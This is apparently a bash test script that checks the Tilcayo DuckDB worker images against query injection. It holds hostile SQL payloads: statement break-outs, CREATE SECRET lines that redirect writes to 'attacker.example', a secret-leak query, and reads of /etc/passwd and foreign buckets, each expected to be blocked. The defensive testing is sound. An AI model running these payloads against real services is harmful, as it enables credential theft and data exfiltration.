#!/usr/bin/env bash
# =============================================================================
# Tilcayo worker attack checks
# Run from anywhere; uses the :test images built by test_workers.sh
# (set BUILD=1 to build them here).
#
# Starts a throwaway MinIO on a private docker network, seeds s3://data/in/,
# then runs each payload THROUGH THE REAL ENTRYPOINT (QUERY / OUTPUT_PATH env)
# of the general, spatial and ml images. Prints a PASS/FAIL table and exits
# non-zero on any FAIL. Credentials below are throwaway values for the local
# container only.
# =============================================================================

set -u
cd "$(dirname "$0")"

NET=tilsec-net
S3=tilsec-s3
EP="$S3:9000"
ADMIN=secadmin
SECRET=sec-secret-7f3a9c
SIGV4="aws:amz:us-east-1:s3"
CURL=curlimages/curl:latest
IMAGES=(general spatial ml)

cleanup() {
  docker rm -f "$S3" >/dev/null 2>&1
  docker network rm "$NET" >/dev/null 2>&1
}
trap cleanup EXIT
cleanup

if [ "${BUILD:-0}" = 1 ]; then
  for i in "${IMAGES[@]}"; do
    docker build -q -f "$i/Dockerfile" -t "tilcayo/worker-$i:test" . >/dev/null || exit 1
  done
fi

# ── Store setup ───────────────────────────────────────────────────────────────

docker network create "$NET" >/dev/null || exit 1
docker run -d --name "$S3" --network "$NET" \
  -e MINIO_ROOT_USER="$ADMIN" -e MINIO_ROOT_PASSWORD="$SECRET" \
  cgr.dev/chainguard/minio:latest server /data >/dev/null || exit 1

s3curl() {  # s3curl <curl args...>  (admin creds, inside the network)
  docker run --rm --network "$NET" "$CURL" -s --user "$ADMIN:$SECRET" --aws-sigv4 "$SIGV4" "$@"
}

for _ in $(seq 1 30); do
  s3curl -o /dev/null -w '%{http_code}' "http://$EP/minio/health/live" | grep -q 200 && break
  sleep 1
done
for b in data evil; do s3curl -X PUT "http://$EP/$b" >/dev/null; done

# Seed inputs: a parquet in data/in/, and decoy objects in evil/ so foreign-bucket
# reads would succeed if not blocked. Generated by a worker image with the
# entrypoint bypassed (setup only, not under test).
SEED_DIR=$(mktemp -d)
chmod 755 "$SEED_DIR"  # curl image runs as a non-root user
trap 'cleanup; rm -rf "$SEED_DIR"' EXIT
docker run --rm -v "$SEED_DIR:/out" --entrypoint python tilcayo/worker-spatial:test -c "
import duckdb
con = duckdb.connect(); con.execute('LOAD spatial')
con.execute(\"COPY (SELECT 42 AS x, 'probe' AS s) TO '/out/probe.parquet'\")
con.execute(\"COPY (SELECT 1 AS id, ST_Point(1,2) AS geom) TO '/out/pts.geojson' (FORMAT GDAL, DRIVER 'GeoJSON')\")
" || exit 1
seed_put() {  # seed_put <local file> <bucket/key>
  docker run --rm --network "$NET" -v "$SEED_DIR:/seed:ro" "$CURL" -s -o /dev/null -w '%{http_code}' \
    --user "$ADMIN:$SECRET" --aws-sigv4 "$SIGV4" -T "/seed/$1" "http://$EP/$2"
}
seed_put probe.parquet data/in/probe.parquet >/dev/null
seed_put pts.geojson   data/in/pts.geojson   >/dev/null
seed_put probe.parquet evil/x.parquet        >/dev/null
seed_put pts.geojson   evil/pts.geojson      >/dev/null

list_bucket() { s3curl "http://$EP/$1?list-type=2"; }
object_exists() {  # object_exists <bucket/key>
  [ "$(s3curl -o /dev/null -w '%{http_code}' -I "http://$EP/$1")" = 200 ]
}

if ! object_exists data/in/probe.parquet; then
  echo "Setup failed: could not seed s3://data/in/probe.parquet" >&2
  exit 1
fi
EVIL_BASELINE=$(list_bucket evil | grep -o '<Key>[^<]*</Key>' | sort)

# ── Runner ────────────────────────────────────────────────────────────────────

RESULTS=()
FAILS=0
JOB=0
OUT=""      # combined stdout+stderr of the last run
RC=0        # exit code of the last run
OUTKEY=""   # bucket/key of the last run's OUTPUT_PATH

# run_worker <image> <query>  — real entrypoint, fresh job output path
run_worker() {
  JOB=$((JOB + 1))
  OUTKEY="data/out/job$JOB/result.parquet"
  OUT=$(docker run --rm --network "$NET" \
    -e AWS_ACCESS_KEY_ID="$ADMIN" -e AWS_SECRET_ACCESS_KEY="$SECRET" \
    -e TILCAYO_S3_ENDPOINT="$EP" -e TILCAYO_S3_URL_STYLE=path -e TILCAYO_S3_USE_SSL=false \
    -e TILCAYO_ALLOWED_INPUTS=s3://data/in/ \
    -e OUTPUT_PATH="s3://$OUTKEY" \
    -e QUERY="$2" \
    "tilcayo/worker-$1:test" 2>&1)
  RC=$?
}

record() {  # record <image> <case> <PASS|FAIL> <detail>
  RESULTS+=("$(printf '%-8s %-34s %-4s %s' "$1" "$2" "$3" "$4")")
  [ "$3" = PASS ] || FAILS=$((FAILS + 1))
}

first_err() { printf '%s' "$OUT" | grep -v '^\s*$' | tail -n 1 | cut -c1-90; }

# expect_blocked <image> <case> <query>: must exit non-zero, write no output
# object, and must not print the secret.
expect_blocked() {
  run_worker "$1" "$3"
  if [ "$RC" -eq 0 ]; then
    record "$1" "$2" FAIL "exit 0: $(first_err)"
  elif printf '%s' "$OUT" | grep -qF "$SECRET"; then
    record "$1" "$2" FAIL "secret in output"
  elif object_exists "$OUTKEY"; then
    record "$1" "$2" FAIL "output object written"
  else
    record "$1" "$2" PASS "exit $RC: $(first_err)"
  fi
}

check_evil_unchanged() {  # check_evil_unchanged <image> <case>
  local now
  now=$(list_bucket evil | grep -o '<Key>[^<]*</Key>' | sort)
  if [ "$now" = "$EVIL_BASELINE" ]; then
    record "$1" "$2" PASS "evil bucket unchanged"
  else
    record "$1" "$2" FAIL "evil bucket changed: $(echo "$now" | tr '\n' ' ')"
  fi
}

# Secret must not appear in stdout/stderr or in the output object.
check_leak() {  # check_leak <image>
  run_worker "$1" "SELECT current_setting('s3_secret_access_key') AS v"
  local obj=""
  if object_exists "$OUTKEY"; then obj=$(s3curl "http://$EP/$OUTKEY" | tr -d '\0'); fi
  if printf '%s%s' "$OUT" "$obj" | grep -qF "$SECRET"; then
    record "$1" "leak current_setting(secret)" FAIL "secret leaked (exit $RC)"
  else
    record "$1" "leak current_setting(secret)" PASS "exit $RC, secret absent"
  fi
}

EVIL_SECRET="CREATE SECRET evil (TYPE S3, KEY_ID '$ADMIN', SECRET '$SECRET', ENDPOINT '$EP', URL_STYLE 'path', USE_SSL false, SCOPE 's3://evil')"
SHADOW_SECRET="CREATE SECRET shadow (TYPE S3, KEY_ID 'attacker', SECRET 'attacker', ENDPOINT 'attacker.example:9000', URL_STYLE 'path', USE_SSL false, SCOPE 's3://data/out/')"

for img in "${IMAGES[@]}"; do
  # Positive control first: proves the store and allow-list work at all.
  run_worker "$img" "SELECT x * 2 AS y FROM read_parquet('s3://data/in/probe.parquet')"
  if [ "$RC" -eq 0 ] && object_exists "$OUTKEY"; then
    record "$img" "positive control (read in/, write out)" PASS "exit 0, object exists"
  else
    record "$img" "positive control (read in/, write out)" FAIL "exit $RC: $(first_err)"
  fi
  # A trailing '--' comment must not swallow the COPY's closing paren.
  run_worker "$img" "SELECT x FROM read_parquet('s3://data/in/probe.parquet') -- trailing comment"
  if [ "$RC" -eq 0 ] && object_exists "$OUTKEY"; then
    record "$img" "positive: trailing -- comment" PASS "exit 0, object exists"
  else
    record "$img" "positive: trailing -- comment" FAIL "exit $RC: $(first_err)"
  fi

  check_leak "$img"

  expect_blocked "$img" "break-out multi-statement" \
    "SELECT 1 AS a) TO 's3://data/out/decoy/x.parquet'; $EVIL_SECRET; COPY (SELECT * FROM 's3://data/in/probe.parquet') TO 's3://evil/breakout_$img.parquet'; COPY (SELECT 1 AS a"
  check_evil_unchanged "$img" "break-out: nothing in evil"

  expect_blocked "$img" "standalone CREATE SECRET"      "$EVIL_SECRET"
  expect_blocked "$img" "SCOPE-shadowing CREATE SECRET" "$SHADOW_SECRET"
  expect_blocked "$img" "read foreign bucket"           "SELECT * FROM read_parquet('s3://evil/x.parquet')"
  expect_blocked "$img" "concat path to foreign bucket" "SELECT * FROM read_parquet('s3://' || 'evil/x.parquet')"
  expect_blocked "$img" "local file outside allow-list" "SELECT content FROM read_text('/etc/passwd')"
  expect_blocked "$img" "http:// URL"                   "SELECT * FROM read_text('http://example.com/')"
  expect_blocked "$img" "ATTACH"                        "ATTACH '/tmp/x.db'"
  expect_blocked "$img" "ATTACH inside SELECT stream"   "SELECT 1; ATTACH '/tmp/x.db'"
  expect_blocked "$img" "INSTALL"                       "INSTALL spatial"

  if [ "$img" = spatial ]; then
    expect_blocked "$img" "ST_Read /vsis3/"   "SELECT * FROM ST_Read('/vsis3/evil/pts.geojson')"
    expect_blocked "$img" "ST_Read /vsicurl/" "SELECT * FROM ST_Read('/vsicurl/http://example.com/x.geojson')"
    expect_blocked "$img" "ST_Read foreign s3" "SELECT * FROM ST_Read('s3://evil/pts.geojson')"
  fi
  check_evil_unchanged "$img" "evil bucket unchanged (end)"
done

# ── Report ────────────────────────────────────────────────────────────────────

echo ""
printf '%-8s %-34s %-4s %s\n' IMAGE CASE RES DETAIL
printf '%s\n' "${RESULTS[@]}"
echo ""
echo "$(( ${#RESULTS[@]} - FAILS )) passed, $FAILS failed"
[ "$FAILS" -eq 0 ]
